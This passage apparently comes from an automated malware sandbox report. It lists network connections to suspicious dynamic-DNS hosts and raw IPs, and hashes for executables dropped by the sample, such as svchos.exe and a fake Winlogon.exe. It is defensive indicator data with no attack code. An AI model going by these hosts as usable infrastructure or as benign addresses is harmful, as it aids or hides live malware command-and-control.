| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22ssh.com | udp |
| US | 8.8.8.8:53 | pool.usa-138.com | udp |
| SG | 45.77.45.115:80 | pool.usa-138.com | tcp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.45.77.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| MD | 194.180.174.53:80 | tcp | |
| RU | 80.87.192.115:80 | tcp | |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | files.000webhost.com | udp |
| HU | 91.219.236.18:80 | 91.219.236.18 | tcp |
| US | 8.8.8.8:53 | 18.236.219.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| CA | 172.98.92.42:58491 | tcp | |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| MD | 194.180.174.41:80 | tcp | |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | 22ssh.com | udp |
| MD | 194.180.174.41:80 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| HU | 91.219.236.148:80 | tcp | |
| RU | 80.87.192.115:80 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| HU | 91.219.236.148:80 | tcp | |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| CA | 172.98.92.42:58491 | tcp | |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| GB | 95.101.143.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | 184.143.101.95.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 95.101.143.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 88.221.135.57:443 | r.bing.com | tcp |
| GB | 88.221.135.57:443 | r.bing.com | tcp |
| GB | 95.101.143.182:443 | th.bing.com | tcp |
| GB | 95.101.143.182:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 57.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bing.com | udp |
| US | 13.107.21.200:443 | bing.com | tcp |
| US | 13.107.21.200:443 | bing.com | tcp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| IE | 20.190.159.68:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 200.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| RU | 80.87.192.115:80 | tcp | |
| GB | 95.101.143.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| GB | 95.101.143.184:443 | www.bing.com | tcp |
| GB | 88.221.135.57:443 | r.bing.com | tcp |
| GB | 88.221.135.57:443 | r.bing.com | tcp |
| GB | 95.101.143.182:443 | th.bing.com | tcp |
| GB | 95.101.143.182:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| GB | 95.101.143.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| N/A | 127.0.0.1:58491 | tcp | |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:58491 | tcp | |
| N/A | 127.0.0.1:58491 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.187.238:80 | google.com | tcp |
| GB | 142.250.187.238:80 | google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| GB | 172.217.16.228:80 | www.google.com | tcp |
| GB | 172.217.16.228:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | support.google.com | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| CA | 172.98.92.42:58491 | tcp | |
| GB | 95.101.143.184:443 | www.bing.com | tcp |
| GB | 88.221.135.57:443 | r.bing.com | tcp |
| GB | 88.221.135.57:443 | r.bing.com | tcp |
| GB | 95.101.143.182:443 | th.bing.com | tcp |
| GB | 95.101.143.182:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| RU | 80.87.192.115:80 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| GB | 95.101.143.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | www.hitmanpro.com | udp |
| GB | 184.28.198.162:443 | www.hitmanpro.com | tcp |
| GB | 184.28.198.162:443 | www.hitmanpro.com | tcp |
| US | 8.8.8.8:53 | 162.198.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.87.42:443 | cdn.cookielaw.org | tcp |
| US | 104.18.87.42:443 | cdn.cookielaw.org | tcp |
| US | 104.18.87.42:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | pricingapi.cleverbridge.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 172.64.155.119:443 | geolocation.onetrust.com | tcp |
| US | 104.16.243.229:443 | pricingapi.cleverbridge.com | tcp |
| GB | 184.28.198.162:443 | www.hitmanpro.com | tcp |
| US | 8.8.8.8:53 | 42.87.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | 229.243.16.104.in-addr.arpa | udp |
| GB | 95.101.143.184:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | sophos-privacy.my.onetrust.com | udp |
| US | 172.64.155.119:443 | sophos-privacy.my.onetrust.com | tcp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| GB | 184.28.198.162:443 | www.hitmanpro.com | tcp |
| US | 104.18.87.42:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| CA | 172.98.92.42:58491 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | download.sophos.com | udp |
| GB | 2.21.185.132:443 | download.sophos.com | tcp |
| GB | 2.21.185.132:443 | download.sophos.com | tcp |
| US | 8.8.8.8:53 | 132.185.21.2.in-addr.arpa | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| RU | 80.87.192.115:80 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | files.surfright.nl | udp |
| US | 8.8.8.8:53 | scan.hitmanpro.com | udp |
| NL | 185.105.204.28:443 | files.surfright.nl | tcp |
| NL | 52.174.35.5:80 | scan.hitmanpro.com | tcp |
| US | 8.8.8.8:53 | 28.204.105.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.35.174.52.in-addr.arpa | udp |
| CA | 172.98.92.42:58491 | tcp | |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | remnants.hitmanpro.com | udp |
| US | 185.228.168.9:53 | 8.8.8.8.zen.spamhaus.org | udp |
| NL | 23.97.160.56:443 | remnants.hitmanpro.com | tcp |
| US | 8.8.8.8:53 | 9.168.228.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.160.97.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | hash.hitmanpro.com | udp |
| NL | 23.97.160.56:443 | hash.hitmanpro.com | tcp |
| RU | 80.87.192.115:80 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | gfhhjgh.duckdns.org | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| RU | 80.87.192.115:80 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| CA | 172.98.92.42:58491 | tcp | |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | scan.hitmanpro.com | udp |
| NL | 52.174.35.5:443 | scan.hitmanpro.com | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| RU | 80.87.192.115:80 | tcp | |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| CO | 179.13.1.253:8050 | gfhhjgh.duckdns.org | tcp |
| US | 8.8.8.8:53 | hackerinvasion.f3322.net | udp |
| US | 8.8.8.8:53 | kazya1.hopto.org | udp |
| CA | 172.98.92.42:58491 | tcp |
Files
memory/4068-0-0x0000000074E62000-0x0000000074E63000-memory.dmp
memory/4068-1-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/4068-2-0x0000000074E60000-0x0000000075411000-memory.dmp
C:\Users\Admin\AppData\Roaming\healastounding.exe
| MD5 | 6fb798f1090448ce26299c2b35acf876 |
| SHA1 | 451423d5690cffa02741d5da6e7c45bc08aefb55 |
| SHA256 | b4f86ff48c5f6b01e0ad4543fb78e0435e81f3ec2aaca89866862157c0dacf4f |
| SHA512 | 9cc2421a2f3ab01d15be62a848947b03f1a8212cfd923573cf70f8c10bd8d124aee3b251828834236af291ea12450ac2580a712e53a022ce11b4d71b0357d8c3 |
C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
| MD5 | ed666bf7f4a0766fcec0e9c8074b089b |
| SHA1 | 1b90f1a4cb6059d573fff115b3598604825d76e6 |
| SHA256 | d1330d349bfbd3aea545fa08ef63339e82a3f4d04e27216ecc4c45304f079264 |
| SHA512 | d0791eaa9859d751f946fd3252d2056c29328fc97e147a5234a52a3728588a3a1aaa003a8e32863d338ebdca92305c48b6fa12ca1e620cf27460bf091c3b6d49 |
memory/3636-44-0x0000000074E60000-0x0000000075411000-memory.dmp
C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
| MD5 | 0fd7de5367376231a788872005d7ed4f |
| SHA1 | 658e4d5efb8b14661967be2183cc60e3e561b2b6 |
| SHA256 | 9083992637e90e412e6f4e77331eb69ee8db821c54bbc38533e0f889cc4ca9dd |
| SHA512 | 522d5be2803fbce0d12c325cc2ef1e3a92cec03aeba7d1164530093ad58caecd827dd557ca3c182a66c6667150e731de37bb552d19425f96cc78fe3423e1a863 |
memory/3636-50-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/4828-62-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/4068-67-0x0000000074E60000-0x0000000075411000-memory.dmp
C:\Users\Admin\AppData\Roaming\gay.exe
| MD5 | 8eedc01c11b251481dec59e5308dccc3 |
| SHA1 | 24bf069e9f2a1f12aefa391674ed82059386b0aa |
| SHA256 | 0184983a425fef55d46b7e0eb729a245730ee26414ebe4b155917c0124a19c2d |
| SHA512 | 52388313b21f14aa69c8b37e0fe0b73f66aa92f08651a16c820aae65d341dc1af6b48f3c8d4f657ac990eeaf4b9a01ae769bca4d3625550011708697d22b69cc |
memory/2336-118-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/3636-151-0x0000000074E60000-0x0000000075411000-memory.dmp
C:\Windows\SysWOW64\TXPlatforn.exe
| MD5 | a4329177954d4104005bce3020e5ef59 |
| SHA1 | 23c29e295e2dbb8454012d619ca3f81e4c16e85a |
| SHA256 | 6156d003d54dcf2ee92f21bd6e7a6a7f91730bd2804381260bcabe465abe6ddd |
| SHA512 | 81e9d456a4abfc7cd9e0943d4a0ce15523362c3179f3368381d1d7974f80a9f9113b5404b96e67e91684e0ea1895b7d0073e4c48d0bfc4fd0244b1af6acf0208 |
memory/5052-172-0x0000000000400000-0x000000000044F000-memory.dmp
C:\Users\Admin\AppData\Roaming\4.exe
| MD5 | e6dace3f577ac7a6f9747b4a0956c8d7 |
| SHA1 | 86c71169025b822a8dfba679ea981035ce1abfd1 |
| SHA256 | 8b4b846fe1023fa173ab410e3a5862a4c09f16534e14926878e387092e7ffb63 |
| SHA512 | 1c8554d3d9a1b1509ba1df569ede3fb7a081bef84394c708c4f1a2fb8779f012c74fbf6de085514e0c8debb5079cc23c6c6112b95bf2f0ab6a8f0bd156a3e268 |
memory/5052-165-0x0000000000400000-0x000000000044F000-memory.dmp
C:\Windows\SysWOW64\240629765.txt
| MD5 | 2d4c94d56bc6ff4b67a7e4c78823128f |
| SHA1 | 64f0eabe0213c7e996f53f64daf1b1cd41cd165e |
| SHA256 | 4d53ccb9a375d968ac7bd0670f3cda71d195bae334445d97c46e96b6dbe34a84 |
| SHA512 | 8e476563ea4876c7170febdb9c75f93298caf8f02aa0cdfee13e7735a85f0e60eb12e22b191e7432bdfcd9507d940df3dfb54969f170ede2bcf2e456ca6a6a4e |
C:\Users\Admin\AppData\Local\Temp\svchos.exe
| MD5 | 3b377ad877a942ec9f60ea285f7119a2 |
| SHA1 | 60b23987b20d913982f723ab375eef50fafa6c70 |
| SHA256 | 62954fdf65e629b39a29f539619d20691332184c6b6be5a826128a8e759bfa84 |
| SHA512 | af3a71f867ad9d28772c48b521097f9bf8931eb89fd2974e8de10990241419a39ddc3c0b36dd38aac4fdf14e1f0c5e228692618e93adce958d5b5dab8940e46f |
memory/764-153-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/764-152-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/764-149-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/4812-146-0x0000000000400000-0x00000000007C2000-memory.dmp
C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
| MD5 | 8f1c8b40c7be588389a8d382040b23bb |
| SHA1 | bef5209ae90a3bd3171e1e0be4e8148c4ccd8a6a |
| SHA256 | ed58ffee46a583c177c792b56c9fc20ccd9509d125f2e3fc90c4f48de7e2c2a1 |
| SHA512 | 9192b6f2f8320a728c445f9cd6e6d66495ad0ebebd7ff193dc09ee8ae57b3933c1b75dc208e7d638db273cb9d31b4ca24ee7bfd9729ff0cdbf432d72bb322b1f |
C:\Users\Admin\AppData\Roaming\a.exe
| MD5 | 52cfd35f337ca837d31df0a95ce2a55e |
| SHA1 | 88eb919fa2761f739f02a025e4f9bf1fd340b6ff |
| SHA256 | 5975e737584ddf2601c02e5918a79dad7531df0e13dca922f0525f66bec4b448 |
| SHA512 | b584282f6f5396c3bbed7835be67420aa14d11b9c42a88b0e3413a07a6164c22d6f50d845d05f48cb95d84fd9545d0b9e25e581324a08b3a95ced9f048d41d73 |
memory/2336-121-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/2336-120-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/2908-109-0x00000000008B0000-0x00000000008C2000-memory.dmp
C:\Users\Admin\AppData\Roaming\aaa.exe
| MD5 | 860aa57fc3578f7037bb27fc79b2a62c |
| SHA1 | a14008fe5e1eb88bf46266de3d5ee5db2e0a722b |
| SHA256 | 5430565c4534b482c7216a0ae75d04e201ee0db0386682c0c010243083c28d29 |
| SHA512 | 6639b3e2594e554c7fa811f22e1c514474d34220155b4c989ad8716db1a0aea65894aa23d78c12a4618c57312da00353a77dd8e6c6bdd927bf865f2e98aff8f1 |
C:\Users\Admin\AppData\Roaming\Opus.exe
| MD5 | 759185ee3724d7563b709c888c696959 |
| SHA1 | 7c166cc3cbfef08bb378bcf557b1f45396a22931 |
| SHA256 | 9384798985672c356a8a41bf822443f8eb0d3747bfca148ce814594c1a894641 |
| SHA512 | ed754357b1b995de918af21fecd9d1464bdea6778f7ab450a34e3aae22ba7eebc02f2442af13774abfdf97954e419ec9e356b54506c7e3bf12e3b76ee882fa2c |
C:\Users\Admin\AppData\Roaming\test.exe
| MD5 | 7e50b292982932190179245c60c0b59b |
| SHA1 | 25cf641ddcdc818f32837db236a58060426b5571 |
| SHA256 | a8dde4e60db080dfc397d7e312e7e9f18d9c08d6088e8043feeae9ab32abdbb8 |
| SHA512 | c6d422d9fb115e1b6b085285b1d3ca46ed541e390895d702710e82a336f4de6cc5c9183f8e6ebe35475fcce6def8cc5ffa8ee4a61b38d7e80a9f40789688b885 |
C:\Users\Admin\AppData\Roaming\___11.19.exe
| MD5 | a071727b72a8374ff79a695ecde32594 |
| SHA1 | b2aba60b3332d6b8f0a56cea310cdc2bdb4f9ffc |
| SHA256 | 8ecdfe60eacb5bf647ae69bcbc41dd727ea3089e92b4b08ebca3a8d162e50745 |
| SHA512 | 854b93fb6b9bf0fe4caef5572935852ce8becf2bc7bd41b192a4b3cefb7854a2405c6c0c06bbdd4e1026ff9440ec753911dcc935fe68118e322614c1b918e400 |
memory/4828-58-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/1820-47-0x0000000000400000-0x0000000000625000-memory.dmp
C:\Users\Admin\AppData\Roaming\22.exe
| MD5 | dbf9daa1707b1037e28a6e0694b33a4b |
| SHA1 | ddc1fcec1c25f2d97c372fffa247969aa6cd35ef |
| SHA256 | a604a3ff78644533fac5ee9f198e9c5f2fa1ae2a5828186367a9e00935cff6b6 |
| SHA512 | 145b606ffd58554050ff8712ddb38c1c66dd5f33ea15fd48474e1c165b2c0348d2413e16c7ad07ff1c65ce71e2be23e3758e6d48c4f2454d5407982119706bfd |
memory/3636-30-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/4812-174-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/788-179-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe
| MD5 | 78d40b12ffc837843fbf4de2164002f6 |
| SHA1 | 985bdffa69bb915831cd6b81783aef3ae4418f53 |
| SHA256 | 308a15dabdc4ce6b96dd54954a351d304f1fcb59e8c93221ba1c412bcdfd1c44 |
| SHA512 | c6575e1771d37ded4089d963bea95deac78b329ed555c991d7c559ee1970dd0887a965e88c09981529adc9c25df5cfd3d57e3dce6724da1f01f1198f0f460b79 |
memory/4812-211-0x0000000006370000-0x0000000006382000-memory.dmp
memory/4812-205-0x0000000005CB0000-0x00000000062C8000-memory.dmp
memory/788-204-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/4812-213-0x0000000006390000-0x000000000649A000-memory.dmp
memory/788-218-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe
| MD5 | 870d6e5aef6dea98ced388cce87bfbd4 |
| SHA1 | 2d7eee096d38d3c2a8f12fcba0a44b4c4da33d54 |
| SHA256 | 6d50833895b2e3eb9d6f879a6436660127c270b6a516cda0253e56a3d8b7fba0 |
| SHA512 | 0d55ab28b2f80136af121b870b7503551d87bbeb2848cf9a32540006cac9a5e346d9fcce2bf1223a22927f72a147b81487533a10b91373d4fa4429d6159fd566 |
memory/4812-219-0x00000000064A0000-0x00000000064DC000-memory.dmp
C:\Users\Admin\AppData\Roaming\3.exe
| MD5 | 748a4bea8c0624a4c7a69f67263e0839 |
| SHA1 | 6955b7d516df38992ac6bff9d0b0f5df150df859 |
| SHA256 | 220d8f8ff82d413c81bd02dfa001e1c478e8fbea44bad24f21b3a5284e15632e |
| SHA512 | 5fcdfddce3cc2e636001ed08c5f2f7590aadaa37c091f7ba94e519d298e284362721f1859c6ffbf064ae23e05d4e0e9754b515396812fbe9f9028497396799fd |
C:\Users\Admin\AppData\Local\Temp\tmpCCD5.tmp
| MD5 | 28219e12dd6c55676bdf791833067e9d |
| SHA1 | a4c854d929404e5073d16610c62dfa331c9727a0 |
| SHA256 | d3035bd90ad0e9fedeecb44da09e78421b5e6e1e0bbed1afc624750043355540 |
| SHA512 | e8c118063052002745c503b8fd0decfecf38f31e71e4dbdedc79bb8e91d443d65a33e7d983d4c0e1d6ee1eb9045100c2324b941b3bef00e69d4d91eb7d6d0161 |
memory/4812-235-0x0000000006520000-0x000000000656C000-memory.dmp
memory/788-229-0x0000000010000000-0x00000000101B6000-memory.dmp
C:\Users\Admin\AppData\Roaming\HD____11.19.exe
| MD5 | b14120b6701d42147208ebf264ad9981 |
| SHA1 | f3cff7ac8e6c1671d2c3387648e54f80957196de |
| SHA256 | d987bd57582a22dfc65901ff256eda635dc8dad598c93b200002130b87fcfd97 |
| SHA512 | 27a066b9d842acd7b1e0ca1dd045a9262b0d0a00c180eedeebeb9d3091925b184186fc3a1d2df28ae4c55626febe6abf6fdb5e26d45fd1a2968d57540e7cf29b |
memory/788-184-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/788-185-0x0000000010000000-0x00000000101B6000-memory.dmp
memory/4812-176-0x0000000000400000-0x00000000007C2000-memory.dmp
memory/4448-239-0x0000000000400000-0x00000000019AA000-memory.dmp
C:\ProgramData\kaosdma.txt
| MD5 | 2c807857a435aa8554d595bd14ed35d1 |
| SHA1 | 9003a73beceab3d1b1cd65614347c33117041a95 |
| SHA256 | 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b |
| SHA512 | 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9 |
memory/1492-265-0x0000000000140000-0x00000000001D4000-memory.dmp
memory/1492-301-0x0000000000980000-0x000000000098C000-memory.dmp
memory/1492-302-0x0000000000990000-0x000000000099A000-memory.dmp
memory/1492-325-0x00000000009B0000-0x00000000009BC000-memory.dmp
memory/4448-323-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4448-329-0x00000000060E0000-0x00000000064A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpD543.tmp
| MD5 | 2862e61d09852ea2886c036af0465051 |
| SHA1 | 45e30b14543868213f7f1cba0a1e0cc840fb2cd2 |
| SHA256 | d4ba6219d0aff5a36d129a8475cf35b00043d205f751f63ddd56a5c7d4a03ff3 |
| SHA512 | 33dfd9d12adaa19dd3d4dd7013930e233dd3ff1d114e1e86e50d20ffa848a27582eebdffc09ab974b8de86316c01da6f6254f349992ad507d0f8b13cf0e36579 |
memory/5052-332-0x0000000000400000-0x000000000044F000-memory.dmp
memory/4448-312-0x00000000060E0000-0x00000000064A2000-memory.dmp
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
| MD5 | 889b99c52a60dd49227c5e485a016679 |
| SHA1 | 8fa889e456aa646a4d0a4349977430ce5fa5e2d7 |
| SHA256 | 6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910 |
| SHA512 | 08933106eaf338dd119c45cbf1f83e723aff77cc0f8d3fc84e36253b1eb31557a54211d1d5d1cb58958188e32064d451f6c66a24b3963cccd3de07299ab90641 |
memory/4448-309-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4448-306-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4448-304-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/1492-303-0x00000000009A0000-0x00000000009AC000-memory.dmp
memory/4448-319-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4448-315-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4828-339-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/4828-344-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/4464-355-0x0000000000420000-0x00000000004E9000-memory.dmp
memory/4464-356-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4464-354-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4464-353-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4448-361-0x0000000000400000-0x00000000019AA000-memory.dmp
memory/3636-364-0x0000000000400000-0x0000000000495000-memory.dmp
memory/3636-362-0x0000000000400000-0x0000000000495000-memory.dmp
memory/4384-372-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-373-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-374-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-383-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-382-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-381-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-380-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-379-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-378-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\holderwb.txt
| MD5 | f94dc819ca773f1e3cb27abbc9e7fa27 |
| SHA1 | 9a7700efadc5ea09ab288544ef1e3cd876255086 |
| SHA256 | a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92 |
| SHA512 | 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196 |
C:\Windows\Help\Winlogon.exe
| MD5 | a8ddace9435fe395325fc45dde8bd0a3 |
| SHA1 | dcf9baaa9e3a27450debf4f35112376ed005c800 |
| SHA256 | 6e81d7c71b3e8d731e11ad75d3dac02a4210c9f90fac618af5c00cbce3718658 |
| SHA512 | 2c6006e42ecf31da02a4584e69c0e55390be5a405353307582852728b2ceb65033f3f5cd0b6465b3a1541d19eab95c61b394e3403dee558196c2f2969d82b196 |
C:\Windows\Help\active_desktop_render.dll
| MD5 | 07a36097730666fe9e5434d85a5ab989 |
| SHA1 | 780ca47c15932ed1f9640c17b9bb340410a52338 |
| SHA256 | 1fb4cee4d83d424e0bfcbfd97169ef717b3ebdcc5d01ba7c7c547ae606ad5c3c |
| SHA512 | 4a08080471c660856af724e4480ec721c22c462346e293d93e2f9577e6d669c6b51cd81ef96dfad943c791dfd7f7f0c2d5234a82d81ce5f1c01bb493cda34085 |
memory/3888-427-0x00007FF612BA0000-0x00007FF613120000-memory.dmp
memory/3888-451-0x00007FF612BA0000-0x00007FF613120000-memory.dmp
memory/4448-465-0x0000000000400000-0x00000000019AA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 37f660dd4b6ddf23bc37f5c823d1c33a |
| SHA1 | 1c35538aa307a3e09d15519df6ace99674ae428b |
| SHA256 | 4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8 |
| SHA512 | 807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d7cb450b1315c63b1d5d89d98ba22da5 |
